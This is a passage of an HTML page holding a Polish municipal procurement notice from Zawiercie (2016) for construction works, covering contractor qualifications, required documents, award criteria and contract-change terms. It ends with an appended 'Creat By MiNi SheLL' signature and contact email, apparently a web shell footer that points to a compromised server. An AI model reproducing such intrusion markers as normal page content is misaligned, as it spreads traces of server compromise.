- instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń lub odpowiadające im ważne uprawnienia budowlane upoważniające do kierowania robotami budowlanymi będącymi przedmiotem zamówienia, które zostały wydane na podstawie wcześniej obowiązujących przepisów.

W/w osoby powinny posiadać uprawnienia budowlane zgodnie z ustawą z dnia 07 lipca 1994 r. Prawo budowlane (tekst jedn. Dz. U. z 2013 r., poz. 1409 z późn. zm.) oraz rozporządzeniem Ministra Infrastruktury i Rozwoju z dnia 24 września 2014 r. w sprawie samodzielnych funkcji technicznych w budownictwie (Dz. U. z 2014 r., poz. 1278)
lub odpowiadające im ważne uprawnienia budowlane upoważniające do kierowania robotami budowlanymi będącymi przedmiotem zamówienia, które zostały wydane na podstawie wcześniej obowiązujących przepisów
lub
spełniać warunki, o których mowa w art. 12a ustawy z dnia 7 lipca 1994 r. Prawo budowlane (tekst jednolity Dz. U. z 2013 r. poz. 1409 z późniejszymi zmianami), tj. osoba (-y) której (-ych) odpowiednie kwalifikacje zawodowe zostały uznane na zasadach określonych w przepisach odrębnych lub spełniać wymogi o których mowa w art. 20a ustawy z dnia 15.12. 2000 r. o samorządach zawodowych architektów, inżynierów budownictwa oraz urbanistów (świadczenie usług transgranicznych). Zamawiający dopuszcza łączenie ww. funkcji.
Wykonawca potwierdza spełnianie warunku poprzez złożenie: 1) Oświadczenia upoważnionego przedstawiciela Wykonawcy o spełnieniu warunków udziału w postępowaniu
(załącznik nr 1 do SIWZ). W przypadku Wykonawców wspólnie ubiegających się o zamówienie oświadczenie może być złożone wspólnie - oceniany będzie ich łączny potencjał; 2) Wykazu osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych niezbędnych do wykonania zamówienia, oraz informacją o podstawie do dysponowania tymi osobami, który stanowi załącznik nr 3 do SIWZ.
W przypadku Wykonawców wspólnie ubiegających się o zamówienie dokument ten składa przynajmniej jeden z Wykonawców, albo wszyscy ci Wykonawcy wspólnie - oceniany będzie ich łączny potencjał; 3) Oświadczenia, że osoby, które będą uczestniczyć w wykonywaniu zamówienia (wskazane przez Wykonawcę w wykazie osób) posiadają wymagane uprawnienia (zawarte w wykazie osób, o którym mowa powyżej). 
W przypadku Wykonawców wspólnie ubiegających się o zamówienie oświadczenie to składa przynajmniej jeden z Wykonawców, albo wszyscy ci Wykonawcy wspólnie - oceniany będzie ich łączny potencjał.
Ocena spełniania przedstawionego powyżej warunku zostanie dokonana wg formuły: spełnia - nie spełnia. Zamawiający wymaga, żeby Wykonawca wykazał, nie później niż
na dzień składania ofert, spełnianie warunku, o którym mowa powyżej.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeśli Wykonawca wykaże, iż posiada środki finansowe lub zdolność kredytową, w wysokości nie mniejszej niż 1 000 000,00 zł. Wykonawca potwierdza spełnianie warunku poprzez złożenie: 1) Oświadczenia upoważnionego przedstawiciela Wykonawcy o spełnieniu warunków udziału w postępowaniu (załącznik nr 1 do SIWZ). W przypadku Wykonawców wspólnie ubiegających się o zamówienie oświadczenie może być złożone wspólnie - oceniany będzie ich łączny potencjał; 2) Informacji banku lub spółdzielczej kasy oszczędnościowo-kredytowej, potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową Wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
Uwaga: W przypadku przedstawienia przez wykonawcę, w celu wykazania spełniania warunków, dokumentów, w których występuje waluta inna niż polska, w celu jej przeliczenia stosowany będzie średni kurs NBP na dzień zamieszczenia ogłoszenia o zamówieniu w Biuletynie Zamówień Publicznych.
Uwaga: Jeżeli z uzasadnionych przyczyn Wykonawca nie może przedstawić dokumentów, które w wystarczający sposób potwierdzają spełnianie warunku dotyczącego sytuacji finansowej i ekonomicznej może przedstawić inne dokumenty, które w wystarczający sposób potwierdzają spełnianie warunku opisanego powyżej zgodnie z art. 26 ust. 2c ustawy Pzp.
Uwaga: Jeżeli Wykonawca wskazując spełnianie warunku, o którym mowa powyżej polega na zasobach innych podmiotów zgodnie z art. 26 ust. 2b ustawy, Zamawiający wymaga przedłożenia dokumentów, o których mowa powyżej - dotyczącej tych podmiotów. 
Ocena spełniania przedstawionego powyżej warunku zostanie dokonana wg formuły: spełnia - nie spełnia. Zamawiający wymaga, żeby Wykonawca wykazał, nie później niż
na dzień składania ofert, spełnianie warunku, o którym mowa powyżej.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">określenie robót budowlanych, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o robotach budowlanych niewykonanych lub wykonanych nienależycie<br>Wykaz i dowody określające, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone należy ograniczyć wyłącznie do robót budowlanych potwierdzających spełnienie warunku w zakresie wiedzy i doświadczenia;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową innego podmiotu, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)	Druk Formularz oferty, sporządzony wg wzoru stanowiącego załącznik nr 7 do SIWZ.
2)	Kosztorys ofertowy sporządzony metodą kalkulacji uproszczonej na podstawie przedmiarów robót stanowiących załączniki do  specyfikacji. Kosztorys ofertowy powinien zostać sporządzony ściśle wg przedmiaru robót i zawierać: numer pozycji, kod pozycji, numer specyfikacji technicznej wykonania i odbioru robót budowlanych (STWiORB), nazwę (opis) pozycji, jednostkę miary, ilość jednostek miary, cenę jednostkową netto i wartość netto.
3)	Pełnomocnictwo ustanowione do reprezentowania Wykonawcy/ów ubiegającego/cych się o udzielenie zamówienia publicznego. Pełnomocnictwo należy dołączyć w oryginale bądź kopii, potwierdzonej za zgodność z oryginałem notarialnie.
4)	W przypadku wniesienia wadium w postaci pieniężnej, zalecane jest dołączenie do oferty kopii potwierdzenia nadania przelewu.
5)	W przypadku wniesienia wadium w postaci niepieniężnej, należy dołączyć do oferty oryginał dokumentu potwierdzającego wniesienie wadium - zgodnie z pkt. VIII ust. 4 SIWZ.
6) Jeżeli Wykonawca, wykazując spełnianie warunków, o których mowa w art. 22 ust. 1 ustawy Pzp - określonych w pkt III.3.2, III.3.4 i III.3.5 - polega na zasobach innych podmiotów, na zasadach określonych w art. 26 ust. 2b ustawy Pzp, - zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował tymi zasobami w trakcie realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie (w oryginale lub kopii poświadczonej za zgodność przez notariusza, lub kopii poświadczonej za zgodność z oryginałem przez podmiot udostępniający zasoby) tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby wykonania zamówienia.
Podmiot, który zobowiązał się do udostępnienia zasobów zgodnie z art. 26 ust. 2b ustawy Pzp, odpowiada solidarnie z wykonawcą za szkodę zamawiającego powstałą wskutek nieudostępnienia tych zasobów, chyba że za nieudostępnienie zasobów nie ponosi winy. Zamawiający w celu oceny, czy wykonawca będzie dysponował zasobami innych podmiotów w stopniu niezbędnym dla należytego wykonania zamówienia oraz oceny, czy stosunek łączący wykonawcę z tymi podmiotami gwarantuje rzeczywisty dostęp do ich zasobów, żąda dokumentu/ów dotyczących  w szczególności:
-	zakresu dostępnych wykonawcy zasobów innego podmiotu,
-	sposobu wykorzystania zasobów innego podmiotu, przez wykonawcę, przy wykonywaniu  zamówienia,
-	charakteru stosunku, jaki będzie łączył wykonawcę z innym podmiotem,
-	zakresu i okresu udziału innego podmiotu przy wykonywaniu zamówienia.
Propozycję treści dokumentu (zobowiązania) stanowi Załącznik nr 6 do SIWZ Wzór Zobowiązania do oddania do dyspozycji Wykonawcy niezbędnych zasobów na potrzeby wykonania zamówienia.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Okres gwarancji - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Z wykonawcą, który złoży najkorzystniejszą ofertę zostanie zawarta umowa, której wzór stanowi załącznik do  specyfikacji istotnych warunków zamówienia.
2.	Zamawiający przewiduje możliwość istotnych zmian postanowień umowy w przypadku:
1)	Zmiany terminu realizacji przedmiotu umowy, w następstwie:
a)	siły wyższej - rozumianej jako wystąpienie zdarzenia nadzwyczajnego, zewnętrznego, niemożliwego do przewidzenia i zapobieżenia, którego nie dało się uniknąć nawet przy zachowaniu najwyższej staranności a które uniemożliwia Wykonawcy wykonanie przedmiotu umowy. W razie wystąpienia siły wyższej Strony umowy zobowiązane są dołożyć wszelkich starań w celu ograniczenia do minimum opóźnienia w wykonywaniu swoich zobowiązań umownych, powstałego na skutek działania siły wyższej;
b)	braku możliwości prowadzenia prac budowlanych w wyniku złej pogody, trwającej ponad 5 dni roboczych, uniemożliwiającej wykonywanie prac /robót/ lub usług budowlanych ze względu na wymogi producentów materiałów lub urządzeń, jeżeli rzeczywiście nie prowadzono w tym okresie prac, robót budowlanych oraz innych usług wchodzących w zakres przedmiotu umowy,  przy czym w takim przypadku na wniosek Zamawiającego, Wykonawca  zobowiązany jest przedstawić dokumenty zawierające informację producentów materiałów lub  urządzeń o ww. wymogach;
c)	wystąpienie niewypałów, niewybuchów, innych przedmiotów stanowiących zagrożenie,
d)	wystąpienie wykopalisk archeologicznych, itp.;
e)	okoliczności leżących po stronie Zamawiającego i nie wynikających z przyczyn leżących po stronie Wykonawcy (np. wstrzymanie, zawieszenie, przerwa w realizacji Inwestycji).
Termin wykonania umowy ulega odpowiednio zmianie o okres trwania okoliczności celem ukończenia przedmiotu umowy w sposób należyty. Zmiana terminu realizacji Inwestycji nie wpływa na zmianę wynagrodzenia. Wraz ze zmianą terminu realizacji Inwestycji zaktualizowany zostaje harmonogram rzeczowo-finansowy.
2)	Dokonania nieistotnych zmian w dokumentacji projektowej (zgodnie z opracowaną procedurą zmian - zatwierdzony Wniosek o wprowadzenie zmian robót/obiektów), wskutek:
a)	wystąpienia różnic między ilością robót określoną przedmiarem robót planowanych do wykonania, a rzeczywistymi ilościami wynikającymi z obmiarów robót wykonanych,
b)	konieczności przeprowadzenia robót objętych dokumentacją projektową, które nie były przewidziane w zestawieniu robót planowanych (przedmiarze), nie wykraczające poza zakres zamówienia podstawowego przewidzianego w dokumentacji projektowej;
c)	wykonania robót wynikających z dokonania nieistotnych zmian w dokumentacji projektowej, zmian technologii wykonania o ile nie powoduje to istotnego zwiększenia wynagrodzenia i o ile nie wykracza poza zakres zamówienia podstawowego przewidzianego w dokumentacji projektowej;
Zmiany te nie wymagają aneksu do umowy, jeżeli ich wprowadzenie nie spowoduje przekroczenia wynagrodzenia Wykonawcy określonego w § 7 ust.1 umowy.
3)	Zmiany wynagrodzenia Wykonawcy, w następstwie:
a)	zmiany będącej skutkiem działań organów państwowych jeżeli zmiana ta będzie miała wpływ na koszty wykonania Umowy przez Wykonawcę (np. wprowadzenie nowego podatku, zmiana stawki podatku od towarów i usług, zmiana wysokości minimalnego wynagrodzenia ustalonego na podstawie przepisów o minimalnym wynagrodzeniu za pracę, zmiana zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawki składki na ubezpieczenia społeczne lub zdrowotne) 
b)	zwiększenia kosztów realizacji przedmiotu umowy wynikających z dokonania zmian wskazanych w niniejszej umowie a prowadzących do zwiększenia wynagrodzenia Wykonawcy określonego w § 7 ust.1 umowy. W przypadku zmniejszenia kosztów realizacji przedmiotu umowy nie jest wymagane zawarcie aneksu do umowy,
c)	zmiany maksymalnych wysokości płatności w 2016 r., 2017 r., o których mowa w § 7 ust.1 umowy.
4)	Zmiany osób przy pomocy których Wykonawca realizuje przedmiot umowy. 
a)	w przypadku braku możliwości wykonywania przedmiotu umowy przez wskazane osoby, Wykonawca po uzyskaniu akceptacji Zamawiającego może powierzyć te czynności innym osobom o kwalifikacjach, uprawnieniach spełniających co najmniej takie warunki jakie podano w specyfikacji istotnych warunków zamówienia dla przeprowadzonego postępowania;
b)	w przypadku uznania przez Zamawiającego, że dotychczasowy kierownik budowy lub kierownicy robót nie wykonują swoich obowiązków wynikających z umowy. W takim przypadku Wykonawca  obowiązany jest zmienić kierownika budowy lub kierowników robót zgodnie z żądaniem Zamawiającego w terminie wskazanym przez Zamawiającego.
Zmiana osób przy pomocy których Wykonawca realizuje przedmiot umowy nie wymaga sporządzenia aneksu do umowy.
5)	Zmiany, rezygnacji, bądź wprowadzenia podwykonawcy w trakcie realizacji; jeżeli zmiana lub rezygnacja z podwykonawcy dotyczy podmiotu, na którego zasoby Wykonawca powoływał się, na zasadach określonych w art. 26 ust. 2b ustawy Prawo zamówień publicznych, w celu wykazania spełniania warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 tej ustawy, Wykonawca jest obowiązany wykazać Zamawiającemu, iż proponowany inny podwykonawca lub Wykonawca samodzielnie spełnia je w stopniu nie mniejszym niż wymagany w trakcie postępowania o udzielenie zamówienia. Zmiana, rezygnacja lub wprowadzenie w trakcie realizacji umowy nowego podwykonawcy, nie stanowi zmiany umowy o ile zmiana ta nie spowoduje wprowadzenia dodatkowego zakresu/części zamówienia realizowanego przez podwykonawcę/ów. Zmiana poprzez wprowadzenie/zgłoszenie w trakcie realizacji umowy nowego zakresu/części zamówienia realizowanego w podwykonawstwie, który nie został wskazany w Ofercie, stanowi zmianę umowy i musi być poprzedzona zawarciem aneksu do umowy. Zmiana poprzez rezygnację ze wskazanego w Ofercie zakresu/części zamówienia nie stanowi zmiany umowy i nie jest wymagane zawarcie aneksu do umowy. Zmiana, rezygnacja lub wprowadzenie dalszego Podwykonawcy nie stanowi zmiany umowy i nie jest wymagane zawarcie aneksu do umowy.
3.	Zmianie podlegają także wszelkie nieistotne postanowienia w stosunku do treści oferty, w tym m.in.:
1)	Zmiana osób wyznaczonych do kontaktów, współpracy ze strony Wykonawcy lub ze strony Zamawiającego (w przypadku braku możliwości wykonywania wskazanych czynności przez te osoby) - zmiana ta nie wymaga zawarcia aneksu do umowy;
2)	zmiana danych związana z obsługą administracyjno-organizacyjną umowy, (danych teleadresowych Wykonawcy; Zamawiającego) - zmiana ta następuje poprzez pisemne zgłoszenie tego faktu drugiej stronie i nie wymaga zawarcia aneksu do umowy.
4.	Przekształcenie Wykonawcy w związku z sukcesją generalną, przekształceniami, dziedziczeniem spółek handlowych zgodnie z KSH, a także sukcesją z mocy prawa, zgodnie z obowiązującymi przepisami (następstwa prawne), zmiana nazwy Wykonawcy - winno nastąpić w formie aneksu do umowy.
5.	W przypadku wystąpienia okoliczności skutkujących podstawę do zmiany umowy, każda ze Stron występuje z wnioskiem na piśmie o dokonanie takiej zmiany.
6.	Wszelkie zmiany i uzupełnienia niniejszej umowy dokonane w sposób zgodny z ustawą Prawo zamówień publicznych wymagają formy pisemnej pod rygorem nieważności - aneks do umowy, z zastrzeżeniem przypadków określonych w niniejszym paragrafie, w których wskazano, że nie jest wymagane zawarcie aneksu do umowy. 
7.	Zmiana umowy dokonana z naruszeniem przepisów ustawy Prawo zamówień publicznych jest nieważna.
8.	Zmiana wysokości wynagrodzenia należnego Wykonawcy w przypadku zaistnienia       przesłanki, o której mowa w ust. 2 pkt 3) lit a), będzie odnosić się wyłącznie do części       przedmiotu Umowy zrealizowanej, zgodnie z terminami ustalonymi Umową, po dniu       wejścia w życie przepisów zmieniających stawkę podatku od towarów i usług oraz        wyłącznie do części przedmiotu Umowy, do której zastosowanie znajdzie zmiana stawki       podatku od towarów i usług.
9. W przypadku zmiany, o której mowa w ust. 2 pkt 3) lit a), wartość wynagrodzenia netto nie zmieni się, a wartość wynagrodzenia brutto zostanie wyliczona na podstawie nowych       przepisów.
10. Zmiana wysokości wynagrodzenia w przypadku zaistnienia przesłanki, o której mowa w        ust. 2 pkt 3) lit a), będzie obejmować wyłącznie część wynagrodzenia należnego       Wykonawcy, w odniesieniu do której nastąpiła zmiana wysokości kosztów wykonania       Umowy przez Wykonawcę w związku z wejściem w życie przepisów odpowiednio       zmieniających wysokość minimalnego wynagrodzenia za pracę lub dokonujących zmian w zakresie zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub w zakresie wysokości stawki składki na ubezpieczenia społeczne lub zdrowotne.
11. W przypadku zmiany, o której mowa w ust. 2 pkt 3) lit a), wynagrodzenie Wykonawcy ulegnie zmianie o kwotę odpowiadającą wzrostowi kosztu Wykonawcy w związku ze       zwiększeniem wysokości wynagrodzeń Pracowników świadczących Usługi do wysokości      aktualnie obowiązującego minimalnego wynagrodzenia za pracę, z uwzględnieniem        wszystkich obciążeń publicznoprawnych od kwoty wzrostu minimalnego wynagrodzenia. Kwota odpowiadająca wzrostowi kosztu Wykonawcy będzie odnosić się  wyłącznie do części wynagrodzenia Pracowników świadczących Usługi, o których mowa w zdaniu poprzedzającym, odpowiadającej zakresowi, w jakim wykonują oni prace bezpośrednio związane z realizacją przedmiotu Umowy.
12. W przypadku zmiany, o której mowa w ust. 2 pkt 3) lit a), wynagrodzenie Wykonawcy ulegnie zmianie o kwotę odpowiadającą zmianie kosztu Wykonawcy ponoszonego w związku z wypłatą wynagrodzenia Pracownikom świadczącym Usługi. Kwota odpowiadająca zmianie kosztu Wykonawcy będzie odnosić się wyłącznie do części wynagrodzenia Pracowników Świadczących Usługi, o których mowa w zdaniu poprzedzającym, odpowiadającej zakresowi, w jakim wykonują oni prace bezpośrednio związane z  realizacją przedmiotu Umowy.
13. W celu zawarcia aneksu, o którym mowa w ust. 6, każda ze Stron może wystąpić do         drugiej Strony z wnioskiem o dokonanie zmiany wysokości wynagrodzenia należnego         Wykonawcy, wraz z uzasadnieniem zawierającym w szczególności szczegółowe          wyliczenie całkowitej kwoty, o jaką wynagrodzenie Wykonawcy powinno ulec zmianie,          oraz wskazaniem daty, od której nastąpiła bądź nastąpi zmiana wysokości kosztów           wykonania Umowy uzasadniająca zmianę wysokości wynagrodzenia należnego          Wykonawcy.
14.W przypadku zmian, o których mowa w ust. 2 pkt 3) lit a), jeżeli z wnioskiem występuje Wykonawca, jest on zobowiązany odpowiednio do rodzaju zmiany dołączyć do wniosku dokumenty, z których będzie wynikać, w jakim zakresie zmiany te mają wpływ na koszty wykonania Umowy, w szczególności: 
1)	pisemne zestawienie wynagrodzeń (zarówno przed jak i po zmianie) Pracowników świadczących Usługi, wraz z określeniem zakresu (części etatu), w jakim wykonują oni prace bezpośrednio związane z realizacją przedmiotu Umowy oraz części wynagrodzenia odpowiadającej temu zakresowi 
2)	pisemne zestawienie wynagrodzeń (zarówno przed jak i po zmianie) Pracowników świadczących Usługi, wraz z kwotami składek uiszczanych do Zakładu Ubezpieczeń Społecznych/Kasy Rolniczego Ubezpieczenia Społecznego w części finansowanej przez Wykonawcę, z określeniem zakresu (części etatu), w jakim wykonują oni prace bezpośrednio związane z realizacją przedmiotu Umowy oraz części wynagrodzenia odpowiadającej temu zakresowi 
15. W przypadku zmiany, o której mowa w ust. 2 pkt 3) lit a), jeżeli z wnioskiem występuje      Zamawiający, jest on uprawniony do zobowiązania Wykonawcy do przedstawienia w      wyznaczonym terminie, nie krótszym niż 10 dni roboczych, dokumentów, z których      będzie wynikać w jakim zakresie zmiana ta ma wpływ na koszty wykonania Umowy, w      tym pisemnego zestawienia wynagrodzeń.
16. W terminie  10 dni roboczych od dnia przekazania wniosku, o którym mowa w ust. 13,       Strona, która otrzymała wniosek, przekaże drugiej Stronie informację o zakresie, w jakim       zatwierdza wniosek oraz wskaże kwotę, o którą wynagrodzenie należne Wykonawcy       powinno ulec zmianie, albo informację o niezatwierdzeniu wniosku wraz z       uzasadnieniem.
17. W przypadku otrzymania przez Stronę informacji o niezatwierdzeniu wniosku lub       częściowym zatwierdzeniu wniosku, Strona ta może ponownie wystąpić z wnioskiem, o        którym mowa w ust. 13. W takim przypadku przepisy ust. 13 - 16 oraz 18 stosuje się        odpowiednio.
18. Zawarcie aneksu nastąpi nie później niż w terminie 10 dni roboczych od dnia zatwierdzenia wniosku o dokonanie zmiany wysokości wynagrodzenia należnego Wykonawcy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zawiercie.bip.net.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Zawierciu, ul. Leśna 2,42-400 Zawiercie, Wydział Zamówień Publicznych (pokój nr 202).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.03.2016 godzina 12:00, miejsce: Urząd Miejski w Zawierciu, ul. Leśna 2,42-400
Zawiercie,Punkt Obsługi Interesanta (Informacja) parter UM.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Ogłoszenie o zamówieniu zostało zamieszczone w Biuletynie
Zamówień Publicznych w dniu 17.02.2016r.
Zamawiający wykluczy z postępowania o udzielenie zamówienia wykonawców, którzy w okresie 3 lat przed wszczęciem postępowania, w sposób zawiniony poważnie naruszyli obowiązki zawodowe, w szczególności, gdy wykonawca w wyniku zamierzonego działania lub rażącego niedbalstwa nie wykonali lub nienależycie wykonali zamówienie, co zamawiający jest w stanie wykazać za pomocą dowolnych środków dowodowych. Zamawiający nie wykluczy z postępowania o udzielenie zamówienia wykonawców, który udowodnią, że podjęli konkretne środki techniczne, organizacyjne i kadrowe, które mają zapobiec zawinionemu i poważnemu naruszaniu obowiązków zawodowych w przyszłości oraz naprawili szkody powstałe w wyniku naruszenia obowiązków zawodowych lub zobowiązali się do ich naprawienia..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com